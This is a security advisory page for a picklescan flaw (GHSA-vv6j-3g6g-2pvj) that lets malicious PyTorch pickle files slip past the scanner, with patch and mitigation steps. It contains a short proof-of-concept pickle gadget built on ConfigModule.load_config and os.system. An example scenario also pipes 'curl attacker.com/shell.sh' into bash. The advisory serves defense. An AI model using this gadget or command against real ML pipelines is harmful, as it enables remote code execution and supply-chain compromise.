GHSA-vv6j-3g6g-2pvj: picklescan: PyTorch gadget bypasses scanner, enables RCE

GHSA-vv6j-3g6g-2pvj MEDIUM
Published August 22, 2025
CISO Take

Any ML pipeline using picklescan <= 0.0.27 as a security gate before loading pickle files has a false negative vulnerability — malicious models crafted with a PyTorch gadget pass scanning as safe but execute arbitrary code on load. Upgrade picklescan to 0.0.28 immediately and treat any pickle files scanned with the vulnerable version as unverified. Consider mandating safetensors format for all new model artifacts.

Risk Assessment

Medium severity by CVSS, but operationally HIGH for organizations using picklescan as a security control in MLOps pipelines. The attack does not require privileges or user interaction beyond the normal act of loading a model. The false-negative nature of the bypass is particularly dangerous: security teams have a positive confirmation artifact ('scan passed') that provides false assurance. Model registries, CI/CD pipelines, and shared model repositories are the primary exposure surface.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip <= 0.0.27 0.0.28
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

5 steps
  1. Patch: Upgrade picklescan to >= 0.0.28 immediately — this is the only fix.

  2. Audit: Identify all pickle files scanned with vulnerable versions in the past 90 days; treat as untrusted and re-scan or replace.

  3. Defense-in-depth: Do not rely on a single scanner — add network egress monitoring on training/serving hosts to detect RCE callback attempts.

  4. Format migration: Prefer safetensors or ONNX formats over raw pickle for model serialization; block .pkl/.pt files from external sources where possible.

  5. Sandbox: Load untrusted models in isolated environments (container with no network, restricted syscalls via seccomp) before promotion to production pipelines.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system for high-risk AI
ISO 42001
6.1.2 - AI risk assessment 8.4 - AI system supply chain
NIST AI RMF
GOVERN-6.1 - Policies and procedures are in place for AI supply chain risk management MANAGE-2.2 - Mechanisms are in place to sustain treatment of AI risk
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-vv6j-3g6g-2pvj?

Any ML pipeline using picklescan <= 0.0.27 as a security gate before loading pickle files has a false negative vulnerability — malicious models crafted with a PyTorch gadget pass scanning as safe but execute arbitrary code on load. Upgrade picklescan to 0.0.28 immediately and treat any pickle files scanned with the vulnerable version as unverified. Consider mandating safetensors format for all new model artifacts.

Is GHSA-vv6j-3g6g-2pvj actively exploited?

No confirmed active exploitation of GHSA-vv6j-3g6g-2pvj has been reported, but organizations should still patch proactively.

How to fix GHSA-vv6j-3g6g-2pvj?

1. Patch: Upgrade picklescan to >= 0.0.28 immediately — this is the only fix. 2. Audit: Identify all pickle files scanned with vulnerable versions in the past 90 days; treat as untrusted and re-scan or replace. 3. Defense-in-depth: Do not rely on a single scanner — add network egress monitoring on training/serving hosts to detect RCE callback attempts. 4. Format migration: Prefer safetensors or ONNX formats over raw pickle for model serialization; block .pkl/.pt files from external sources where possible. 5. Sandbox: Load untrusted models in isolated environments (container with no network, restricted syscalls via seccomp) before promotion to production pipelines.

What systems are affected by GHSA-vv6j-3g6g-2pvj?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science workbenches.

What is the CVSS score for GHSA-vv6j-3g6g-2pvj?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils._config_module.load_config function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import pickle from torch.utils._config_module import ConfigModule class Evil: def __reduce__(self): return (os.system, ('whoami',)) class EvilTorchUtilsConfigModuleLoadConfig: def __reduce__(self): evil_payload = pickle.dumps(Evil()) return ConfigModule.load_config, (None, evil_payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

Attacker publishes a PyTorch model to a public registry (e.g., Hugging Face). The model's pickle payload wraps `os.system('curl attacker.com/shell.sh | bash')` inside a `ConfigModule.load_config` reduce call. An automated MLOps pipeline downloads the model, runs `picklescan model.pkl` — scan exits clean. The pipeline calls `torch.load('model.pkl')` as part of validation or benchmarking. The payload executes with the pipeline's permissions, granting the attacker a reverse shell on training infrastructure with potential access to proprietary training data, API keys in environment variables, and lateral movement within the ML platform.

Timeline

Published
August 22, 2025
Last Modified
August 22, 2025
First Seen
March 24, 2026

Related Vulnerabilities